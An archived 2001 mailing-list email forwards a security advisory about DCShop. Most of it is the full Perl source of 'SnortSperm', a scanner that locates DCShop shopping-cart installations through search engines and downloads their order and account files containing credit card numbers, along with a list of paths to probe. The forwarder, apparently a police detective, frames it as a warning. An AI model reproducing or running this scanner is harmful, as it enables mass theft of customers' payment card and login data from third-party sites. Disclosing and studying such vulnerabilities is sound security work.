[iwar] FW: [TOOL] SnortSperm, a DCShop Order and Account Scanner

From: Robert W. Miller (snooker3@mindspring.com)
Date: 2001-08-06 06:48:37 

Return-Path: <sentto-279987-1556-997105726-fc=all.net@returns.onelist.com>
Delivered-To: fc@all.net
Received: from 204.181.12.215 by localhost with POP3 (fetchmail-5.1.0) for fc@localhost (single-drop); Mon, 06 Aug 2001 06:50:10 -0700 (PDT)
Received: (qmail 22427 invoked by uid 510); 6 Aug 2001 12:50:59 -0000
Received: from n1.groups.yahoo.com (216.115.96.51) by 204.181.12.215 with SMTP; 6 Aug 2001 12:50:59 -0000
X-eGroups-Return: sentto-279987-1556-997105726-fc=all.net@returns.onelist.com
Received: from [10.1.4.53] by hh.egroups.com with NNFMP; 06 Aug 2001 13:48:46 -0000
X-Sender: snooker3@mindspring.com
X-Apparently-To: iwar@onelist.com
Received: (EGP: mail-7_2_0); 6 Aug 2001 13:48:45 -0000
Received: (qmail 51653 invoked from network); 6 Aug 2001 13:48:45 -0000
Received: from unknown (10.1.10.26) by l7.egroups.com with QMQP; 6 Aug 2001 13:48:45 -0000
Received: from unknown (HELO mclean.mail.mindspring.net) (207.69.200.57) by mta1 with SMTP; 6 Aug 2001 13:48:44 -0000
Received: from h2o4me (1Cust120.tnt1.pueblo.co.da.uu.net [63.25.205.120]) by mclean.mail.mindspring.net (8.9.3/8.8.5) with SMTP id JAA15752; Mon, 6 Aug 2001 09:48:41 -0400 (EDT)
To: <iwar@yahoogroups.com>, <htcc-l@health.state.ny.us>, "Cfid List Member" <Cfid@infobin.org>
Message-ID: <MABBIJMGDBFOJAPPFCAECEFDEAAA.snooker3@mindspring.com>
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
From: "Robert W. Miller" <snooker3@mindspring.com>
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Delivered-To: mailing list iwar@yahoogroups.com
Precedence: bulk
List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com>
Date: Mon, 6 Aug 2001 07:48:37 -0600
Reply-To: iwar@yahoogroups.com
Subject: [iwar] FW: [TOOL] SnortSperm, a DCShop Order and Account Scanner
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Be careful where you drop your credit card out there.


The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com


SnortSperm, a DCShop Order and Account Scanner
------------------------------------------------

DETAILS

The following program will search the Internet (using popular search
engines) for vulnerable installations of DCShop. When it finds one, it
will try and grab the order and account files (they contain both order
details and credit card numbers).

Exploit Code:
--- ss.pl ---
#!/usr/bin/perl
#
# SnortSperm v1.1, a DCShop (Web shopping cart system) order and account
scanner
# by darkman, with help of antistar and bsl4
# A proof of concept
#
# Users running windows have to download and install ActivePerl from
# www.activeperl.com, and run the script from the MS-DOS Prompt by typing:
#
# \perl\bin\perl <path of ss.pl>\ss.pl
#
# I'd like to thank Peter Helms for publishing the information regarding
this
# exploit.
#
# E-mail: darkman@coderz.net
# Homepage: www.coderz.net/darkman

use LWP::Simple;
use LWP::UserAgent;
my $ua=new LWP::UserAgent;

# flush stdout (so we get 'in progress' messages)
$|=1;

# fake useragent
$ua->agent("Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)");

# hash arrays
my %unique_urls;
my %unique_sites;
my %flatfiles;
my %pathfiles;
my %additional_paths;
my %vulnerable_sites;

# scanning using search engine
sub scan_search_engine {
  $url = shift;

  print STDERR ".";
  @urls = split /\n/, get($url);
  for (@urls) {
    if (/$link/) {
      $1 =~ /(.*)\/.*$/;

      $_ = $1;
      path_traversal();
    }
    scan_search_engine("$search_engine_url$1") if (/$next/);
  }
}

# path traversal
sub path_traversal {
  $_ = "http://$_" if (not /:\/\//);
  @split_url = split /\//, $_;
  $unique_sites{$split_url[2]} = $split_url[2];

  additional_urls() if ((scalar keys %additional_paths!=0) && ($_ ne ''));

  while (not /:\/$/) {
           $unique_urls{$_}=$_;
    $_ = substr $_,0,rindex $_,"/";
  }
}

# additional urls
sub additional_urls {
  foreach $path (keys %additional_paths) {
    if ($path =~ /^\//) {
      $unique_urls{"$split_url[0]//$split_url[2]$path"} =
"$split_url[0]//$split_url[2]$path";
    } else {
      $unique_urls{"$url/$path"} = "$url/$path";
    }
  }
}

# scan url
sub scan_url {
  $first_try = shift;
  $second_try = shift;

         $url_ = "$url/$first_try";

  print STDERR "Trying $url_\n";

  $page = get($url_);
  @lines = split /\x0d/, $page;
  if ((@lines+0 == 0) || ($lines[0] =~ /^</) || ($lines[0] =~ /^ </) ||
($lines[0] =~ /^\n</)) {
    $url_ = "$url/$second_try";

    print STDERR "Trying $url_\n";

    $page = get($url_);
    @lines = split /\x0d/, $page;
  }
  if ((@lines+0 > 0) && (not $lines[0] =~ /^</) && (not $lines[0] =~ /^
</) && (not $lines[0] =~ /^\n</)) {
          print "$url_\n\n";

          for (@lines) {
      $occurrences = ($_ =~ tr/|//);
      $max_occurrences = $occurrences if ($occurrences >
$max_occurrences);

      if (/^\n</) {
        print "\n";
              last;
            }
            print "$_";
    }
           $vulnerable_sites{"$stripped_url$filename"}=true;

          print "\n";
          print "\n" if ($occurrences == 1);
          print STDERR "Success.\n";
        }
}

# check arguements
foreach $opt (@ARGV) {
  $proxyserver = $1 if ($opt =~ "proxy=(.*)");
  $proxyport = $1 if ($opt =~ "port=(.*)");
  $altavista = 1 if ($opt eq "altavista");
  $google = 1 if ($opt eq "google");
  $lycos = 1 if ($opt eq "lycos");
  $nbci = 1 if ($opt eq "nbci");
  $netscape = 1 if ($opt eq "netscape");
  $yahoo = 1 if ($opt eq "yahoo");
  $flatfiles{$1} = $1 if ($opt =~ "flatfile=(.*)");
  $pathfiles{$1} = $1 if ($opt =~ "pathfile=(.*)");
}

print STDERR "SnortSperm v1.1, a DCShop (Web shopping cart system) order
and account scanner\n";

# show options if no valid arguements were found
if (!($altavista or $google or $lycos or $nbci or $netscape or $yahoo) &&
(scalar keys %flatfiles==0)) {
  print STDERR "usage: ./ss.pl <options>\n\nproxy=<proxyserver> for
scanning using a proxy server\nport=<proxyport> for specifying proxy port
(default proxy port is 8080)\naltavista for scanning using
AltaVista\ngoogle for scanning using Google\nlycos for scanning using
Lycos\nnbci for scanning using NBCi (use additional paths with this
option)\nnetscape for scanning using Netscape Search\nyahoo for scanning
using Yahoo!\nflatfile=<filename> for scanning using a flat
file\npathfile=<filename> for additional paths\n\noptions can be
combined";

  exit;
}

# load additional paths
foreach $pathfile (keys %pathfiles) {
  if ($pathfile ne '') {
          open(FH, $pathfile);
          while (<FH>) {
            chomp;
            $_ = $1 if (/(.*)\/$/);

            $additional_paths{$_}=$_ if ($_ ne '');
          }
  }
}

# scan through a proxy (insert proxyserver and port)
if ($proxyserver) {
  $proxyport = 8080 if (!$proxyport);

  print STDERR "using $proxyserver:$proxyport as proxy\n";

  $ua->proxy('http',"$proxyserver:$proxyport");
}

# scanning using selected search engines
if ($altavista) {
  print STDERR "\nScanning using AltaVista";

  $search_engine_url = "http://www.altavista.com";
  $link = "status='([^']*)";
  $next = "a href=\"([^\"]+).*\\[Next";

scan_search_engine("$search_engine_url/sites/search/web?q=DCShop&pg=q&kl=XX"
);
}
if ($google) {
  print STDERR "\nScanning using Google";

  $search_engine_url = "http://www.google.com";
  $link = "<p><A HREF=([^>]*)";
  $next = "A HREF=([^>]+).*<b>Next<\\/b>";
  scan_search_engine("$search_engine_url/search?q=DCShop");
}
if ($lycos) {
  print STDERR "\nScanning using Lycos";

  $search_engine_url = "http://www.lycos.co.uk";
  $link = "<b><a href=\"([^\"]*)";
  $next = "A HREF=([^>]+).*<B>Forward<\\/B>";

scan_search_engine("$search_engine_url/cgi-bin/pursuit?matchmode=and&mtemp=m
ain&etemp=error&query=DCShop&cat=lycos");
}
if ($nbci) {
  print STDERR "\nScanning using NBCi";

  $search_engine_url = "http://www.goto.com";
  $link = "<em>([^<]*)";
  $next = "a href=\"([^\"]+).*<b>More";

scan_search_engine("$search_engine_url/d/search/p/nbci/?Keywords=DCShop");
}
if ($netscape) {
  print STDERR "\nScanning using Netscape Search";

  $search_engine_url = "http://search.netscape.com";
  $link = "size=\"1\">([^<]*)";
  $next = "a href=\"([^\"]+).*next>>";

scan_search_engine("$search_engine_url/search.psp?cp=nsikwphopNetscape&chars
et=UTF-8&search=DCShop");
}
if ($yahoo) {
  print STDERR "\nScanning using Yahoo!";

  $search_engine_url = "http://google.yahoo.com";
  $link = "#006600>([^&]*)";
  $next = "a href=\"([^\"]+).*Next 20 ";
  scan_search_engine("$search_engine_url/bin/query?p=DCShop&hc=0&hs=0");
}
# scanning using flat file(s)
foreach $flatfile (keys %flatfiles) {
  if ($flatfile ne '') {
    print STDERR "\nScanning using flat file: $flatfile";

          open(FH, $flatfile);
          while (<FH>) {
            chomp;
            $_ = $1 if (/(.*)\/$/);

      path_traversal();
    }
  }
}

# show number of sites found
$total_urls = 4*scalar keys %unique_urls;
$total_sites = scalar keys %unique_sites;
print STDERR "\nFound $total_urls URLs at $total_sites sites to scan\n";

# scan for vulnerable sites
foreach $url (sort(keys %unique_urls)) {
  @split_url = split /\//, $url;
  $stripped_url ="$split_url[0]//$split_url[2]";

  if ($current_url ne $stripped_url) {
    $current_url = $stripped_url;
    print STDERR "\n";
  }
  $filename = "/orders.txt";
  scan_url("Orders$filename","orders$filename") if
(!$vulnerable_sites{"$stripped_url$filename"});
  $filename = "/auth_user_file.txt";
  scan_url("Auth_data$filename","auth_data$filename") if
(!$vulnerable_sites{"$stripped_url$filename"});
}

--- paths.txt ---
/cgi-bin/DCShop
/cgi_bin/DCShop
/cgi-bin/dcshop
/cgi_bin/dcshop
/cgibin/DCShop
/cgibin/dcshop
/cgi-bin/shop
/cgi_bin/shop
/cgibin/shop
/shop/DCShop
/shop/dcshop
/shopping
/cgi-bin
/cgi_bin
/cgibin
/DCShop
/dcshop
/mall
/shop
/DC
/dc


ADDITIONAL INFORMATION

The information has been provided by  <mailto:auto91991@hushmail.com>
Sandra.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body
to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.


Det. Robert W. Miller
Colorado Internet Crimes Against
Children Task Force
Pueblo High Tech. Crime Unit
Pueblo County Sheriff's Office
320 S. Joe Martinez Blvd.
Pueblo West, CO. 81007
Tel (719)583-4736
FAX (719)583-4732
mailto:snooker3@mindspring.com
mailto:cicactf@iex.net
http://www2.co.pueblo.co.us/sheriff/
PGP key available at: http://pgpkeys.mit.edu:11371/
search on snooker@iex.net




------------------------ Yahoo! Groups Sponsor ---------------------~-->
Small business owners...
Tell us what you think!
http://us.click.yahoo.com/vO1FAB/txzCAA/ySSFAA/kgFolB/TM
---------------------------------------------------------------------~->

------------------
http://all.net/ 

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/

This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:39 PDT